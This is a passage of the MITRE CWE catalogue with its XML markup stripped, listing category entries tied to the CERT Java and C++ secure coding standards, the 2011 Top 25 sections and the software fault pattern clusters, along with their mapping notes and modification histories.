+ CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Observed_Examples, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Terminology_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Input Validation and Data Sanitization (IDS) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 00 - Input Validation and Data Sanitization (IDS) + + + + Weaknesses in this category are related to rules in the Declarations and Initialization (DCL) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 01 - Declarations and Initialization (DCL) + + + + Weaknesses in this category are related to rules in the Expressions (EXP) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 02 - Expressions (EXP) + + + + Weaknesses in this category are related to rules in the Numeric Types and Operations (NUM) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 03 - Numeric Types and Operations (NUM) + + + + Weaknesses in this category are related to rules in the Object Orientation (OBJ) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 04 - Object Orientation (OBJ) + + + + Weaknesses in this category are related to rules in the Methods (MET) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 05 - Methods (MET) + + + + Weaknesses in this category are related to rules in the Exceptional Behavior (ERR) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 06 - Exceptional Behavior (ERR) + + + + Weaknesses in this category are related to rules in the Visibility and Atomicity (VNA) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 07 - Visibility and Atomicity (VNA) + + + + Weaknesses in this category are related to rules in the Locking (LCK) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 08 - Locking (LCK) + + + + Weaknesses in this category are related to rules in the Thread APIs (THI) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 09 - Thread APIs (THI) + + + + Weaknesses in this category are related to rules in the Thread Pools (TPS) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 10 - Thread Pools (TPS) + + + + Weaknesses in this category are related to rules in the Thread-Safety Miscellaneous (TSM) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 11 - Thread-Safety Miscellaneous (TSM) + + + + Weaknesses in this category are related to rules in the Input Output (FIO) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 12 - Input Output (FIO) + + + + Weaknesses in this category are related to rules in the Serialization (SER) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 13 - Serialization (SER) + + + + Weaknesses in this category are related to rules in the Platform Security (SEC) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 14 - Platform Security (SEC) + + + + Weaknesses in this category are related to rules in the Runtime Environment (ENV) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 15 - Runtime Environment (ENV) + + + + Weaknesses in this category are related to rules in the Miscellaneous (MSC) chapter of The CERT Oracle Secure Coding Standard for Java (2011). + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT Java Secure Coding Section 49 - Miscellaneous (MSC) + + + + Weaknesses in this category are listed in the "Insecure Interaction Between Components" section of the 2011 CWE/SANS Top 25 Most Dangerous Software Errors. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-06-25 + 2.0 + 2011-06-27 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are listed in the "Risky Resource Management" section of the 2011 CWE/SANS Top 25 Most Dangerous Software Errors. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-06-25 + 2.0 + 2011-06-27 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are listed in the "Porous Defenses" section of the 2011 CWE/SANS Top 25 Most Dangerous Software Errors. + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-06-25 + 2.0 + 2011-06-27 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are not part of the general Top 25, but they were part of the original nominee list from which the Top 25 was drawn. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-06-25 + 2.0 + 2011-06-27 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Preprocessor (PRE) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2019-01-03 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Declarations and Initialization (DCL) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Expressions (EXP) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Integers (INT) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Floating Point Arithmetic (FLP) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Arrays and the STL (ARR) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Characters and Strings (STR) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Memory Management (MEM) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Input Output (FIO) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Environment (ENV) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Signals (SIG) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Exceptions and Error Handling (ERR) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Object Oriented Programming (OOP) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Concurrency (CON) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to rules in the Miscellaneous (MSC) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2011-08-04 + 2.1 + 2011-09-13 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Risky Values cluster (SFP1). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Risky Values + + + + This category identifies Software Fault Patterns (SFPs) within the Unused entities cluster (SFP2). + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Unused entities + + + + This category identifies Software Fault Patterns (SFPs) within the API cluster (SFP3). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: API + + + + This category identifies Software Fault Patterns (SFPs) within the Exception Management cluster (SFP4, SFP5, SFP6). + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Exception Management + + + + This category identifies Software Fault Patterns (SFPs) within the Memory Access cluster (SFP7, SFP8). + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Memory Access + + + + This category identifies Software Fault Patterns (SFPs) within the Memory Management cluster (SFP38). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Memory Management + + + + This category identifies Software Fault Patterns (SFPs) within the Resource Management cluster (SFP37). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + 